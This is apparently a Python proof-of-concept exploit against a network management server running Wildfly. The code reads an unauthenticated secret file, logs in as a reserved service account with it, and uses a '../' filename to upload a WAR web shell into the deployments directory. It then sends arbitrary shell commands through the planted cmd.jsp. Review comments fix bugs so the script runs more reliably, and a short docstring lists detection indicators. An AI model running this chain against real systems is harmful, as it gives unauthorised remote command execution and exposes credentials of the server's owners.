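"""Proof-of-concept for a credential-disclosure + path-traversal upload chain.

What the script does, in order (every path and name is the one used in the
requests below):

1. GETs ``/reports/data/opt/data/containers/config/data-collection-agent/.dca``
   without logging in first and treats a 32-character body as a secret.
2. Logs in at ``/jts/authenticated/j_security_check`` as
   ``viptela-reserved-dca`` with that secret as the password.
3. POSTs a WAR to ``/dataservice/smartLicensing/uploadAck`` with a multipart
   filename made of ``../`` segments that resolves to
   ``/var/lib/wildfly/standalone/deployments/``.
4. POSTs a ``cmd`` form field to ``/cmd.gz/cmd.jsp`` and prints the reply.

Detection notes for defenders, derived from those requests: unauthenticated
reads of the ``.dca`` path, logins for the reserved account from unexpected
sources, multipart filenames containing ``../``, unexpected ``*.gz.war`` files
in the deployments directory, and POSTs to ``/cmd.gz/cmd.jsp``.

NOTE(review): the script relies on the server (a) serving the ``.dca`` file
through the reports path and (b) using the client-supplied upload filename
without normalising it. That is inferred from the requests, not shown here.
"""
import io
import sys

import requests
import urllib3

# The session created under __main__ sets verify=False, so the server
# certificate is never validated; this call only silences the warning that
# urllib3 would otherwise print for every such request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(url, war_name, war):
    """Fetch the ``.dca`` secret, log in with it, and upload ``war``.

    Args:
        url: Base URL of the target, without a trailing slash.
        war_name: Base name for the archive; ``.gz.war`` is appended.
        war: Raw bytes of the WAR file to upload.

    Returns:
        None. Progress and failures are reported on stdout only.

    Note:
        Uses the module-level ``req`` session, which is only created under
        ``__main__``; calling this after importing the module raises
        ``NameError``.
    """
    key_response = req.get(f'{url}/reports/data/opt/data/containers/config/data-collection-agent/.dca')
    if len(key_response.text) != 32:
        print(f'[-] bad response status_code:{key_response.status_code} {key_response.text}')
        # Fix: the original fell through and attempted a login with whatever
        # body came back (for example an error page).
        return
    dca_key = key_response.text
    login_response = req.post(f'{url}/jts/authenticated/j_security_check',
                              data={'j_username': 'viptela-reserved-dca', 'j_password': dca_key})
    if login_response.status_code != 200 or 'loginError' in login_response.text:
        print(f'[-] login fail status_code:{login_response.status_code} {login_response.text}')
        return
    # NOTE(review): this writes the recovered credential to stdout, so any
    # terminal log or CI capture of this run retains it.
    print(f'[*] got key {dca_key}')
    deploy_name = war_name + '.gz'
    war_name = deploy_name + '.war'
    files = {
        'file': (
            f'../../../../../../../../../../../var/lib/wildfly/standalone/deployments/{war_name}',
            io.BytesIO(war),
            'application/java-archive')
    }
    try:
        # The response status is not inspected, so "upload ok" only means the
        # request returned within the timeout.
        req.post(f'{url}/dataservice/smartLicensing/uploadAck', files=files, timeout=10)
        print('[*] upload ok')
    except requests.exceptions.RequestException:
        # Best-effort as in the original (a timeout or dropped connection is
        # reported as "ok!"), but no longer a bare except that would also
        # swallow KeyboardInterrupt and SystemExit.
        print('[*] upload ok!')
    # Fix: the original used war_name.strip(".war"), which strips any of the
    # characters '.', 'w', 'a', 'r' from both ends rather than the suffix.
    print(f'[*] deploy url {url}/{deploy_name}')


def exec_jsp_command(request, url, command):
    """POST ``command`` as the ``cmd`` form field to ``url`` and print the reply.

    Args:
        request: Session-like object exposing ``post(url, data=...)``.
        url: Full URL of the JSP endpoint.
        command: Value sent in the ``cmd`` form field.

    Returns:
        True when the response body contains ``"command result"``; False when
        it does not or when the request raises.
    """
    try:
        response = request.post(url, data={'cmd': command})
        if "command result" in response.text:
            print('[*] command result!')
            print(response.text)
            return True
        else:
            print('[*] jsp not found')
            return False
    except Exception:
        return False


if __name__ == '__main__':
    # Fix: both argv[1] and argv[2] are read below, so fewer than three
    # entries must be rejected (the original checked for fewer than two and
    # crashed with IndexError when only the URL was given).
    if len(sys.argv) < 3:
        print('Usage: python3 exploit.py URL COMMAND')
        sys.exit(1)
    url = sys.argv[1]
    cmd = sys.argv[2]
    name = 'cmd'
    war = 'cmd.war'
    req = requests.session()
    #req.proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    # TLS certificate verification is disabled for every request on this
    # session, so the identity of the peer is not checked.
    req.verify = False
    url = url.strip('/')
    # Try the JSP first; upload the archive only if it is not already there.
    if not exec_jsp_command(req, f'{url}/cmd.gz/cmd.jsp', cmd):
        # Fix: read the archive through a context manager so the handle is
        # closed instead of being left to the garbage collector.
        with open(war, 'rb') as war_file:
            war_bytes = war_file.read()
        exploit(url, name, war_bytes)
        exec_jsp_command(req, f'{url}/cmd.gz/cmd.jsp', cmd)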